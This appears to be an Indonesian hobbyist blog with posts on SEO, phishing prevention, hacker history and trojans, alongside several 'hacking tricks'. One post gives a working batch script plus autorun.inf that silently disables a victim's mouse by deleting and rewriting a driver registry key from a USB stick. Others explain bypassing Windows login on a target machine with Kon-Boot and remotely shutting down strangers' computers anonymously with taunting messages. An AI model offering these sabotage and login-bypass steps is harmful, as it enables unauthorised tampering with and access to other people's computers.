10000000000

Sabtu, 08 Februari 2014

Mengenal Search Engine Optimation

Search engine atau lebih dikenal sebagai mesin pencari, merupakan suatu program atau aplikasi website yang bertugas untuk melakukan pencarian berdasarkan kata kunci yang kita ketikan pada from pencarian.
Lalu apa yang dimaksud dengan Search Engine Optimization?
SEO (Search Engine Optimization) adalah ilmu yang mempelajari bagaimana mendapatkan posisi teratas di dalam hasil pencarian. Karena itu, SEO juga disebut sebagai Search Engine Return Page (SERP).
Ilmu SEO sendiri mulai muncul tahun 1997. Mesin pencari pada masa sebelumnya memiliki banyak kekurangan, antara lain mengindeks situs-situs yang di dalamnya terdapat banyak kata kunci dan link (link farm) padahal website tersebut sama sekali tidak punya hubungan dengan kata kunci yang kita cari.
Dengan kondisi seperti itu, tentu ada yang diuntungkan dan ada pula yang dirugikan. Begitu dahsyatnya kecurangan di dalam teknik itu sehingga search engine terkenal pun, seperti Google, Yahoo, dan Bing, sulit membedakannya. Dalam sistem ini bukan tidak mungkin website yang dikelola dengan teknik SEO yang bersih justru terdepak dari mesin pencari sementara website yang curang justru berjaya.
Tentu saja target utama SEO adalah pengunjung! semakin banyak pengunjung datang, semakin terkenal sebuah website. Lantas apa yang bisa diperoleh dari para pengunjung itu? Di antaranya, kita dapat memanfaatkan pengunjung untuk mempromosikan barang dagangan kita, sekedar share pengetahuan yang kita miliki, memberikan berita terbaru, menghasilkan uang dengan menjual ruang iklan di website kita, mendapatkan keuntungan dengan Pay Per Click, dan masih banyak lagi.

Hasil SERP pada situs google.

Dengan berbagai macam keuntungan di atas maka banyak orang berlomba untuk membuat website, blog, maupun forum agar menjadi yang teratas dalam hasil pencarian search engine.

Kamis, 20 Juni 2013

Mematikan Mouse

Trik ini membuat mouse menjadi tidak aktif dan tidak bisa digunakan, cara memicunya adalah dengan memasukan USB flashdisk ke komputer korban dan secara otomatis menjalankan script yang mematikan fungsi mouse. Korban akan kebingungan dan mungkin akan menganggap mousenya rusak.

Cara membuat script cukup mudah, caranya:
1.Buka notepad dan ketik kode berikut:
@echo off

set key="HKEY_LOCAL_MACHINE\system\
CurrentControlSet\Services\Mouclass"

reg delete %key%

reg add %key% /v Start /t REG_DWORD /d 4

2.Setelah itu simpan file tersebut dengan nama mousehack.bat.
3.Kemudian buka notepad lagi dan ketik kode:

[autorun]

Open=mousehack.bat

Action=Mouse Disable

4.Simpan kode tersebut dengan nama autorun.inf.
5.Setelah itu pindahkan  dua file tersebut ke flashdisk, dan ketika flashdisk di masukkan ke komputer, secara otomatis script akan mematikan mouse.
6.Ok selamat, anda berhasil mematikan mouse si korban :)

Senin, 17 Juni 2013

"PHISING" Mencegah Phising

Phising adalah salah satu cara yang populer digunakan untuk mencari data pribadi seseorang di internet. Metode ini biasa digunakan untuk menipu korban untuk mendapatkan username dan password penting si korban.
Phising biasanya digunakan dengan cara mengirim email palsu tersebut dia akan membuka alamat website tertentu dimana si korban diminta memasukan password. Website yang dibuat oleh pelaku phising tampilannya sama persis dengan website dimana si korban memiliki account sehingga korban tidak curiga dan gampang terjebak.

Ok bro skarang kita langsung saja ke pencegahannya.
Ada beberapa langkah yang bisa dilakukan untuk terhindar dari korban phising, diantaranya:
1.Jangan percaya pada email dari mana saja, termasuk dari layanan besar seperti facebook, Google, Yahoo. Paypal dan layanan lainnya. Teliti terlebih dahulu link-link yang ada pada email, apakah benar menuju ke website asli atau ke alamat website lain.
2.Setiap melakukan login pastikan anda mengetahui betul website dimana anda berada saat itu, periksa url dan segalanya seteliti mungkin.
3.Layanan besar seperti facebook atau Google dan Paypal tidak pernah meminta anda untuk memberikan username dan password.
4.Email dari layanan besar seperti facebook, google dan paypal tidak pernah menyertakan attachment berupa software dan sejenisnya.
5.Jangan pernah klik link pada email anda, selama anda tidak meyakini kebenarannya. Klik link pada email adalah salah satu kesalahan terbesar korban phising dan dari link ini sebagian besar dari mereka terjebak.

Kamis, 13 Juni 2013

Sejarah Singkat Hacker


Hacker adalah orang yang paham komputer dan melakukan analisis, mempelajari, memodifikasi, melakukan teknik penyusupan ke dalam suatu sistem jaringan komputer atau pun program. Hacker juga mampu mengembangkan program untuk membuat program lainnya berjalan lebih baik. Istilah Hacker sendiri lahir di tahun 1959 dari organisa-organisai mahasiswa Tech Model Railroad Club di laboratorium kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Organisasi itu terdiri beberapa orang cerdas dengan satu keyakinan yang tidak mempercayai adanya Tuhan (Atheist), lalu merekalah yang hingga kini mengembangkan komputer dan semua programnya.
Dewasa ini, banyak yang mengartikan istilah Hacker dengan Cracker. Yaitu perusak sistem komputer, Padahal secara etika, keduanya justru bertentangan. Paham etika Hacker adalah :
1.Menghormati ilmu pengetahuan & kebebasan berinformasi.
2.Memberitahukan sistem administrator akan adanya celah pada sistem.
3.Tidak mengambil keuntungan dari sistem yang di Hack.
4.Melarang penyebaran program bajakan.
5.Memberikan informasi kepada orang lain secara gratis, dan itu tanpa terkecuali oleh siapa saja.
6.Tidak pernah memanipulasi kartu kredit (carding).
7.Tidak pernah memberikan akses ke seseorang untuk tujuan jahat.
8.Tidak merusak, memodifikasi dan memanipulasi sistem yang di Hack.
9.Menghormati komputer yang di Hack seperti komputer sendiri.

Rabu, 24 April 2013

Hack Windows Password

Bqpass Windows Password
Windows dilengkapi dengan user management, yang memungkinkan pemilik komputer memakai password untuk masuk atau login ke windows. Ada beberapa cara bagi orang yang tidak memiliki password atau lupa password untuk masuk ke windows yang diproteksi password, cara yang umum di pakai adalah melakukan cracking password.
Cara lain yang lebih simpel dan tanpa melakukan crack password adalah menggunakan aplikasi KON-BOOT. Aplikasi ini berguna untuk bypass atau melewati proses login dengan password, sehingga tanpa password Anda bisa masuk ke windows dan bisa menjalankan aplikasi layaknya administrator.
1.Untuk menjalankan KON-BOOT pada komputer yang diproteksi password, Anda harus membuat CD booting yang berisi aplikasi KON-BOOT.
2.Buat CD dengan burning ISO file (cd KON-BOOT) yang nanti akan kalian mendownload sendiri.
3.Untuk menjalankan booting CD KON-BOOT, setting BIOS pada komputer target harus mengijinkan booting dari CD, pastikan dengan mengubah setting BIOS, kemudian atur BOOT PRIORITY CD menjadi yang paling awal sebelum Hardisk.
5.Tekan enter pada keyboard setelah muncul splash screen logo Kryptos Logic, Anda dibawa ke tampilan layar berikutnya yang berupa gambar logo dalam code Ascil

Setelah itu, apabila semua berjalan lancar, Anda seharusnya sudah berhasil login ke dalam windows tanpa mengisikan username dan password. Untuk informasi lengkap tentang KON-BOOT Anda bisa membuka http://www.kryptoslogic.com/.

Minggu, 30 Desember 2012

Cara Mengshutdown Komputer Orang Lain Dari Jarak Jauh

Nih buat yang suka iseng, bisa menggunakan trick yang satu ini . Jadi maksudnya adalah kita mengshutdown komputer orang lain dari jarak jauh atau dengan komputer kita juga bisa hehe .. dan tenang saja ketika anda mengshutdown komputernya menggunakan trick ini dia gak bakalan tau siapa yang mengshutdown komputernya .. ok berikut cara caranya :
1. Klik start 
2. Pilih run
3. Ketik cmd >> klik ok
Maka akan terlihat seperti tampilan berikut :

4. ketik Shutdown -i di tampilan tersebut dan tekan enter
Lalu akan terlihat tampilan kotak dialog seperti dibawah ini :

5. Klik Add untuk menambahkan komputer orang yang ingin kita shutdown , . Caranya masukan IP Address komputer tersebut, buat yang belum tau cara lihat IP Address komputer kita : Click Disini
6.  Ada pilihan restart , shutdown dan annotate .. dan pilih sesuka hati anda ^_^ terserah anda ingin apakan tuh komputer
7. Tentukan waktu untuk menghidupkan kembali komputer orang .. Terserah kalian sih mau berapa lama .. kalo saya 30 second ( 30 detik)

8. Ketik komentar anda pada kolom coment, tulisan yang anda ketik akan dibaca oleh orang yang ingin kita matikan komputernya Contoh : Mampus lu komputer lu shutdown !!
9.klik ok dan selesai.

PENGERTIAN DAN SEJARAH TROJAN

1.1  Trojan horse atau sering disebut Trojan merupakan salah satu kelompok malware (perangkat lunak jahat) yang mempunyai fungsi spesifik untuk pengontrolan/akses antara jaringan seperti mencuri data, membuat back-door, mencuri password, dan serangkaian aksi lainnya.
Berbeda dengan jenis perangkat lunak jahat lainnya, Trojan memiliki 2 bagian aplikasi yang terpisah yaitu aplikasi server dan klien. Aplikasi server inilah yang biasanya disebar dengan target penyebaran umum ataupun khusus untuk mendapatkan akses terhadap komputer lain yang terhubung dalam sebuah jaringan (baik) lokal maupun publik. Jika suatu aplikasi server Trojan telah mampu menginfeksi komputer yang terhubung dalam suatu jaringan, maka sang pembuat (pengguna) Trojan dapat mengontrol komputer tersebut dengan aplikasi klien yang dia miliki.
Dilihat dari fungsi dan tujuan, Trojan sendiri sudah memiliki karakteristik khusus dibanding jenis program jahat lainnya, namun jika kita menelusuri dari sejarah penamaan Trojan, program ini rupanya juga memiliki keunikan sendiri. Dimana nama Trojan sendiri diambil dari cerita zaman Yunani kuno yaitu kisah perang troya (Trojan war).
Secara singkat, perang troya mengisahkan pasukan Yunani yang menggunakan taktik perang dengan membuat sebuah kuda raksasa yang dihuni oleh beberapa pasukan Yunani yang telah putus asa karena kekuatan pasukan kerajaan Troya. Kemudian, kuda tersebut ditinggal dalam sebuah kota. Pada saat pasukan troya lengah, pasukan yunani yang berada di dalam kuda raksasa dibantu dengan pasukan lain yang berpura-pura melarikan diri melakukan penyerangan dan akhirnya dapat melumpuhkan pasukan kerajaan Troya.
Entah apa yang mendasari penamaan Trojan dan analoginya dengan kisah tersebut. Akan tetapi, dari berbagai sumber menyatakan bahwa kisah tersebutlah yang mendasari penamaan salah satu jenis program jahat yang mampu dikontrol melalui jaringan untuk tugas-tugas tertentu yaitu'Trojan Horse'.

1.2  Seperti yang telah kita singgung sebelumnya bahwa Trojan memiliki 2 bagian aplikasi utama yaitu aplikasi klien dan server. Trojan tidak dapat terlepas dari konsep jaringan komputer dimana terdapat komputer server dan klien. Namun, secara teoritis ada hal yang membedakan antara konsep server klien pada jaringan dan Trojan bahkan sangat bertolak belakang. Dalam suatu jaringan (biasanya) server merupakan pusat dari sebuah komputer klien. Akan tetapi, pada konsep klien-server Trojan, aplikasi klien merupakan pusat pengontrol dan aplikasi server, dan aplikasi adalah aplikasi yang dikontrol melalui aplikasi klien dari Trojan. Sehingga dengan kata lain konsep klien server dari jaringan komputer dan Trojan dapat dikatakan bertolak belakang walaupun sebenarnya keduanya bekerja pada konteks yang berbeda. Secara konseptual cara kerja dari Trojan (klien-server) adalah sangat sederhana, kedua bagian aplikasi saling berkomunikasi setelah menetapkan koneksi pada 2 (atau lebih) komputer.
Aplikasi klien mengirimkan data kepada aplikasi server melalui port yang ditetapkan. Lalu, aplikasi server menginterprestasikan (menerjemahkan) data tersebut untuk dikonversikan ke dalam serangkaian fungsi yang telah ditetapkan oleh sang pembuat Trojan. Untuk lebih memperjelas hubungan komunikasi serta memperdalam pemahaman tentang Trojan antara aplikasi klien dan server, maka simak penjelasan detail seperti berikut :

1.2.1 Biasanya suatu program server dari Trojan tidak memiliki banyak interface (tampilan antara muka), karena aplikasi server pada Trojan dirancang sedemikian rupa agar kedatangan pada komputer korban tidak dapat diendus oleh pengguna komputer itu sendiri (korban) bahkan dengan bantuan program antivirus sekalipun. Dengan demikian, ketika suatu Trojan sudah mampu menyusup dan mengakar pada suatu komputer korban yang terhubung melalui jaringan maka siap saja (termasuk kita) dapat mengontrol komputer korban dengan aplikasi klien dari Trojan tersebut dengan fasilitas-fasilitas kontrol yang ada pada aplikasi klien. Misalnya, mengambil file, me-restart komputer, mengirim pesan, mencatat ketikan password, dan lain sebagainya.
Seperti yang telah disinggung sebelumnya, secara konseptual cara kerja dari aplikasi server hanyalah menerima data (yang berisi perintah) yang dikirim oleh aplikasi klien, lalu menerjemahkan ke dalam fungsi-fungsi yang telah ditetapkan. Namun, tidak menutup kemungkinan suatu aplikasi server pada Trojan juga mengirimkan data balik terhadap klien sebagai respon dari hasil eksekusi perintah yang diberikan oleh aplikasi klien.

1.2.2  Program klien dari suatu Trojan merupakan pusat kontrol dan kendali utama. Aplikasi klien mampu mencari dan mendeteksi apakah suatu Trojan (pasangannya) dalam keadaan hidup atau mati pada suatu komputer dengan alamat tertentu. Dari aplikasi klien, pengguna Trojan dapat mengirimkan serangkaian perintah untuk dieksekusi oleh aplikasi server pada komputer korban. Sebelum aplikasi klien dan server dapat berhubungan dan melakukan transaksi data melalui suatu port maka aplikasi klien akan menetapkan koneksi terhadap aplikasi server terlebih dahulu. Setelah koneksi berhasil ditetapkan maka aplikasi klien dan server Trojan sudah dapat melakukan serangkaian aksi yang dikehendaki oleh pengguna Trojan.

bersambung...................